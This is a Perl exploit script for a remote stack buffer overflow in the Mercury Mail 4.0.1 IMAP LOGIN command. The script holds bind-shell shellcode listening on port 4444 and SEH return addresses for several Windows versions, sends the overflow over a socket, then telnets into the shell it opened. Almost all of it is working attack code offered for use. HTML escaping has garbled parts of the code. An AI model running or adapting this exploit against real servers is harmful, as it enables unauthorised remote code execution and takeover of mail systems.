Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

                                                #!/usr/bin/perl
# 
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it


use IO::Socket::INET;
use Switch;

if&nbsp;(@ARGV&nbsp;<&nbsp;3)&nbsp;{
print&nbsp;\"--------------------------------------------------------------------
\";
print&nbsp;\"Usage&nbsp;:&nbsp;mercury-4444-multi.pl&nbsp;-hTargetIPAddress&nbsp;-oAssemblyinstructions
\";
print&nbsp;\"&nbsp;Return&nbsp;address:&nbsp;
\";
print&nbsp;\"&nbsp;1&nbsp;-&nbsp;Windows&nbsp;2k&nbsp;Sp4&nbsp;English&nbsp;Version
\";
print&nbsp;\"&nbsp;2&nbsp;-&nbsp;Windows&nbsp;2k&nbsp;Sp4&nbsp;Italian&nbsp;Version
\";
print&nbsp;\"&nbsp;3&nbsp;-&nbsp;Windows&nbsp;XP&nbsp;Sp1&nbsp;English&nbsp;Version
\";
print&nbsp;\"&nbsp;4&nbsp;-&nbsp;Windows&nbsp;XP&nbsp;Sp0&nbsp;English&nbsp;Version
\";
print&nbsp;\"&nbsp;If&nbsp;values&nbsp;not&nbsp;specified,&nbsp;Windows&nbsp;2k&nbsp;Sp4&nbsp;will&nbsp;be&nbsp;used.
\";
print&nbsp;\"&nbsp;Example&nbsp;:&nbsp;./mercury-4444-multi.pl&nbsp;-h127.0.0.1&nbsp;-o1&nbsp;-o1
\";
print&nbsp;\"--------------------------------------------------------------------
\";
}

use&nbsp;IO::Socket::INET;

my&nbsp;$host&nbsp;=&nbsp;10.0.0.2;
my&nbsp;$port&nbsp;=&nbsp;143;
my&nbsp;$reply;
my&nbsp;$request;
my&nbsp;$jmp=\"xe9x02xffxffxff\";

my&nbsp;$nextseh&nbsp;=&nbsp;\"x90x90xebx09\";



#A&nbsp;binary&nbsp;translation&nbsp;of&nbsp;NGS&nbsp;Writing&nbsp;Small&nbsp;Shellcode&nbsp;by&nbsp;Dafydd&nbsp;Stuttard&nbsp;with&nbsp;only&nbsp;two&nbsp;little&nbsp;differences
#1)bind&nbsp;port,&nbsp;in&nbsp;this&nbsp;exploit&nbsp;is&nbsp;4444&nbsp;in&nbsp;the&nbsp;original&nbsp;shellcode&nbsp;was&nbsp;6666
#2)4&nbsp;bytes&nbsp;added&nbsp;to&nbsp;the&nbsp;shellcode&nbsp;in&nbsp;order&nbsp;not&nbsp;to&nbsp;see&nbsp;the&nbsp;window&nbsp;of&nbsp;cmd.exe&nbsp;on&nbsp;remote&nbsp;host
my&nbsp;$shellcode&nbsp;=&nbsp;
\"x59x81xc9xd3x62x30x20x41x43x4dx64\".
\"x64x99x96x8Dx7ExE8x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1C\".
\"x8Bx09x8Bx69x08xB6x03x2BxE2x66xBAx33x32x52x68x77\".
\"x73x32x5Fx54xACx3CxD3x75x06x95xFFx57xF4x95x57x60\".
\"x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFF\".
\"x47x8Bx34xBBx03xF5x99xACx34x71x2AxD0x3Cx71x75xF7\".
\"x3Ax54x24x1Cx75xEAx8Bx59x24x03xDDx66x8Bx3Cx7Bx8B\".
\"x59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3BxF7x75xB4\".
\"x5Ex54x6Ax02xADxFFxD0x88x46x13x8Dx48x30x8BxFCxF3\".
\"xABx40x50x40x50xADxFFxD0x95xB8x02xFFx11x5cx32xE4\".
\"x50x54x55xADxFFxD0x85xC0x74xF8xFEx44x24x2DxFEx44\".
\"x24x2cx83xEFx6CxABxABxABx58x54x54x50x50x50x54x50\".
\"x50x56x50xFFx56xE4xFFx56xE8\";






foreach&nbsp;(@ARGV)&nbsp;{
$host&nbsp;=&nbsp;$1&nbsp;if&nbsp;($_=~/-h((.*).(.*).(.*).(.*))/);
$seh&nbsp;=&nbsp;$1&nbsp;if&nbsp;($_=~/-o(.*)/);
$happy&nbsp;=&nbsp;$1&nbsp;if&nbsp;($_=~/-o(.*)/);
}

switch&nbsp;($seh)&nbsp;{
case&nbsp;1&nbsp;{&nbsp;$seh=\"x43x8fx2dx7c\"&nbsp;}&nbsp;#&nbsp;Win2k&nbsp;SP4&nbsp;English&nbsp;version&nbsp;jmp&nbsp;ebx&nbsp;in&nbsp;advapi32.dll
case&nbsp;2&nbsp;{&nbsp;$seh=\"x43x8fx26x79\"&nbsp;}&nbsp;#&nbsp;Win2k&nbsp;SP4&nbsp;Italian&nbsp;version&nbsp;jmp&nbsp;ebx&nbsp;in&nbsp;advapi32.dll
case&nbsp;3&nbsp;{&nbsp;$seh=\"xc0x5fx3cx76\"&nbsp;}&nbsp;#&nbsp;WinXP&nbsp;Pro&nbsp;English&nbsp;SP1&nbsp;version&nbsp;pop&nbsp;ecx&nbsp;pop&nbsp;ecx&nbsp;ret&nbsp;in&nbsp;comdlg32.dll
case&nbsp;4&nbsp;{&nbsp;$seh=\"xfcx61x3cx76\"&nbsp;}&nbsp;#&nbsp;WinXP&nbsp;Pro&nbsp;English&nbsp;SP0&nbsp;version&nbsp;pop&nbsp;ecx&nbsp;pop&nbsp;ecx&nbsp;ret&nbsp;in&nbsp;comdlg32.dll
}


switch&nbsp;($happy)&nbsp;{
case&nbsp;1&nbsp;{&nbsp;$happy=\"x8dx83x34xffxffxffx50xc3\"&nbsp;}&nbsp;#&nbsp;Win2k&nbsp;SP4&nbsp;English&nbsp;version
case&nbsp;2&nbsp;{&nbsp;$happy=\"x8dx83x34xffxffxffx50xc3\"&nbsp;}&nbsp;#&nbsp;Win2k&nbsp;SP4&nbsp;Italian&nbsp;version
case&nbsp;3&nbsp;{&nbsp;$happy=\"x8bxc1x66x05x34x29x50xc3\"&nbsp;}&nbsp;#&nbsp;WinXP&nbsp;Pro&nbsp;English&nbsp;SP1&nbsp;version
case&nbsp;4&nbsp;{&nbsp;$happy=\"x8bxc1x66x05x34x29x50xc3\"&nbsp;}&nbsp;#&nbsp;WinXP&nbsp;Pro&nbsp;English&nbsp;SP0&nbsp;version
}

my&nbsp;$request&nbsp;=\"1&nbsp;LOGIN\".(\"&nbsp;\"x948).\"{255}
\";



my&nbsp;$socket&nbsp;=&nbsp;IO::Socket::INET->new(proto=>\'tcp\',&nbsp;PeerAddr=>$host,&nbsp;PeerPort=>$port);
$socket&nbsp;or&nbsp;die&nbsp;\"Cannot&nbsp;connect&nbsp;to&nbsp;host!
\";

recv($socket,&nbsp;$reply,&nbsp;1024,&nbsp;0);
print&nbsp;\"Response:\"&nbsp;.&nbsp;$reply;

send&nbsp;$socket,&nbsp;$request,&nbsp;0;
print&nbsp;\"[+]&nbsp;Sent&nbsp;1st&nbsp;request
\";
recv($socket,&nbsp;$reply,&nbsp;1024,&nbsp;0);
print&nbsp;\"Response:\"&nbsp;.&nbsp;$reply;
sleep(1);



my&nbsp;$request&nbsp;=\"x41\"&nbsp;x&nbsp;255;

send&nbsp;$socket,&nbsp;$request,&nbsp;0;
print&nbsp;\"[+]&nbsp;Sent&nbsp;2nd&nbsp;request
\";
sleep(1);

my&nbsp;$request=(\"x45\"&nbsp;x7420).(\"x90\"&nbsp;x10).$happy.(\"x90\"&nbsp;x14).$shellcode.(\"x41\"&nbsp;x8).$nextseh.$seh.(\"x90\"&nbsp;x5).$jmp.(\"x90\"&nbsp;x533);

send&nbsp;$socket,&nbsp;$request,&nbsp;0;
print&nbsp;\"[+]&nbsp;Sent&nbsp;final&nbsp;request
\";
sleep(1);

close($socket);

print&nbsp;\"&nbsp;+&nbsp;connect&nbsp;on&nbsp;port&nbsp;4444&nbsp;of&nbsp;$host&nbsp;...
\";
sleep(3);
system(\"telnet&nbsp;$host&nbsp;4444\");
exit;

&nbsp;